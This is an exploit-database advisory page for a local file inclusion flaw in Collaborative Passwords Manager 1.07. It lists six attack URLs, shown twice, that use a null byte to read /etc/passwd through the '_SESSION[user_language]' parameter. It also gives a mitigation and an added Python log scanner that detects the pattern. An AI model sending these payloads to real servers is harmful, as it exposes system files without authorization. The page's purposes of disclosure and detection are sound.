Vendor: Collaborative Passwords Manager
By: sh00t0ut
CVSS: 7.5 (HIGH)
Vulnerability: Local File Inclusion
CWE: 98
Product Name: Collaborative Passwords Manager
Affected Version From: 1.07
Affected Version To: 1.07
Patch Exists: NO
Related CWE: N/A
CPE: a:cpassman:collaborative_passwords_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Collaborative Passwords Manager 1.07 Multiple Local Include Exploit

Collaborative Passwords Manager 1.07 is vulnerable to local file inclusion. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server, using the '_SESSION[user_language]' parameter to include a malicious file from the local system. The file can be included through the following URLs:

http://[victim]/?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/admin.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/functions.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/views.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/groups.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/items.queries.php?_SESSION[user_language]=[etc/passwd]%00

Mitigation:

The application should be configured to allow access only to files that are necessary for it to function, and only to files located in a specific directory. Access to any other file should be denied.
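Because no patch is listed, a defender may also want to look for this request pattern in web server logs. The following is an added example, not part of the original advisory or the product's code: it flags requests whose query string uses a PHP superglobal name such as `_SESSION[...]` as a parameter name (generalized beyond the one name on this page) or carries a decoded null byte. The log format, sample lines and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# PHP superglobal names a client has no legitimate reason to send as request
# parameter names (the requests on this page use _SESSION[user_language]).
SUPERGLOBAL_PARAM = re.compile(
    rb"^(_SESSION|_SERVER|_COOKIE|_FILES|_ENV|_GET|_POST|_REQUEST|GLOBALS)(\[|$)")
# Request line inside a combined-format access log entry (assumed format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(target):
    """Return the reasons a request target matches the pattern on this page."""
    reasons = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition("=")
        # Decode before matching so %5B / %5D encoded brackets are caught too.
        name = unquote_to_bytes(raw_name.replace("+", " "))
        value = unquote_to_bytes(raw_value.replace("+", " "))
        if SUPERGLOBAL_PARAM.match(name):
            reasons.append("superglobal-param:" + name.decode("latin-1"))
        if b"\x00" in name or b"\x00" in value:
            reasons.append("null-byte")
    return reasons

def scan(log_lines):
    """Return (line_number, reasons) for every suspicious log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_LINE.search(line)
        if match:
            reasons = inspect_request(match.group(1))
            if reasons:
                hits.append((number, reasons))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2011:10:00:00 +0000] "GET /index.php?page=items HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jan/2011:10:00:05 +0000] "GET /sources/items.queries.php?_SESSION[user_language]=x%00 HTTP/1.1" 200 912',
    '192.0.2.66 - - [01/Jan/2011:10:00:06 +0000] "GET /?_SESSION%5Buser_language%5D=x%00 HTTP/1.1" 200 912',
    '192.0.2.11 - - [01/Jan/2011:10:00:09 +0000] "POST /sources/items.queries.php?session_id=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, reasons)
```

The same two conditions can be turned into a blocking rule at a reverse proxy or WAF in front of the application.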

Exploit-DB raw data:

[~] Collaborative Passwords Manager 1.07 Multiple Local Include Exploit
[~] Found by sh00t0ut
[~] Expl: 
[~] Vendor: http://code.google.com/p/cpassman/downloads/list

http://[victim]/?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/admin.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/functions.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/views.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/groups.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/items.queries.php?_SESSION[user_language]=[etc/passwd]%00